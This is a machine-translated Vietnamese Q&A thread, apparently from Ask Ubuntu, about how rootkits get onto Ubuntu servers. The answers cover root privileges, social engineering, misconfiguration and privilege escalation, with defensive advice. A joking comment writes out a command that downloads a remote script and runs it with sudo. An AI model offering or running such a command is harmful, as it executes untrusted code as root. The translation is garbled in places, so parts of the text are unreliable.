Làm thế nào để rootkit được cài đặt trên một máy chủ Ubuntu?

11

Tôi đã thấy một vài bài đăng về việc kiểm tra rootkit nhưng không thể tìm thấy bất kỳ thông tin nào về cách họ truy cập vào hệ thống linux. Đặc biệt, nếu bạn khai thác một lỗi trong trang web php (vâng tôi đang nói về drupageddon ở đây) thì có thể cài đặt rootkit mặc dù bạn chỉ có thể chạy như máy chủ web (dữ liệu www) chứ không phải là root. Rất ít thông tin tôi tìm thấy về cách chúng được cài đặt cho thấy bạn phải root để cài đặt chúng (xem tại đây ).

server  security 
Hà Lan
nguồn
6
Tôi đã viết một hướng dẫn nhỏ, bạn có thể cài đặt nó nếu bạn muốn? chỉ cần gõwget http://mydomain/script.sh;sudo ./script.sh
Nanne
1
Oh, tôi đã chờ đợi phản ứng đó!
Over Killer

Câu trả lời:

9

Nếu là tôi, tôi sẽ thuyết phục phương pháp sau:

  • Yêu cầu người dùng tải xuống và cài đặt một phần mềm (# 1). Có phần mềm đó cài đặt phần mềm dự định. Ẩn một blob blob bên trong ứng dụng đó cho phép bạn tải xuống phần mềm (ví dụ: một công cụ bạn có thể sử dụng để ftp, wget, v.v.).
  • Nhắc nhở cho tài khoản quản trị viên (# 2) và sử dụng tài khoản đó để sử dụng một ví dụ ftp, wget để tải xuống và cài đặt rootkit.

Về # 1: người dùng không bao giờ nên tải xuống phần mềm ngẫu nhiên khi sử dụng Linux; sử dụng các kênh thích hợp (Trung tâm phần mềm Ubuntu) để cài đặt phần mềm. Nếu đó là phần mềm cần được tải xuống bên ngoài các kênh thích hợp, hãy đảm bảo nguồn tải xuống có thể tin cậy được. Hãy nghĩ các phiên bản mới nhất của phần mềm Apache hoặc MySQL. Đừng đi xung quanh tải xuống phần mềm ngẫu nhiên mà không kiểm tra các phương tiện truyền thông xã hội khác nhau về tính toàn vẹn của ứng dụng đó. Microsoft không bao giờ tập trung phần mềm; nó đã dẫn đến rất nhiều người say mê với phần mềm nên cơ sở người dùng của họ là hugh, nhưng điều đó cũng giúp bạn dễ dàng truy cập vào máy tính và bắt đầu thu thập dữ liệu họ có thể bán.

Về # 2: lỗ hổng nghiêm trọng của người dùng. Không bao giờ từng gõ mật khẩu quản trị của bạn trừ khi bạn biết tại sao nó được hỏi.

Gió giật
nguồn
8

Có, nói chung, cần có quyền root để cài đặt rootkit. Nhiều rootkit chứa một mô-đun được tải vào kernel, công cụ ghi đè khác thường được sử dụng bởi root. Trong một hệ thống được thiết lập đúng và hoàn hảo, sẽ không có cách nào để cài đặt bộ công cụ gốc mà không có quyền root, nhưng ...

... có thể có vấn đề với cấu hình hệ thống làm cho hệ thống không an toàn. ... có thể có các lỗi bảo mật cho phép nâng cao đặc quyền ... có thể có cách để lừa người dùng bằng quyền root để chạy thứ gì đó xấu.

Các cách không giới hạn như trí tưởng tượng của kẻ xâm nhập.

Klaus D.
nguồn
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.